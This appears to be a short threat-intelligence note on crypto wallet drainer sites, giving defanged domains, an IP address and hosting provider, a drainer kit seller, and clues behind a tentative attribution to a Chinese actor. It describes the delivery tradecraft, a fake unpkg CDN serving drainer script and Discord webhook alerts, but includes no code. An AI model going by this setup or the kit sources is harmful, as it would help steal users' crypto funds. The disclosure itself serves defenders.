Solana, Ethereum, and NFT drainers from wl-now[.]com. Uses fake unpkg to serve drainer js and Discord webhooks for real-time alerts. Shows relation to presaless[.]com and drainer kit from cryptokens[.]sellix[.]io (previously tokens404[.]com).
Likely to be a Chinese threat actor/s due to multiple indications:
- Configuration of the receiver wallet was left untouched and showed 钱包 which translates to "wallet"
- Discord webhook was given a username of "houmen" which translates to "backdoor". The avatar displays a Chinese school girl (cdn.discordapp.com/avatars/979351082012659755/b791e87ac09e0fcd70bef0721b074513.png -> facebook.com/JK照片-100190912056316/photos/pcb.100195085389232/100195032055904/)
- Drainers were hosted in a server from HK/China (Cloudie Limited [AS55933] 103.105.23[.]18
- The fake unpkg domain displays a default page in Chinese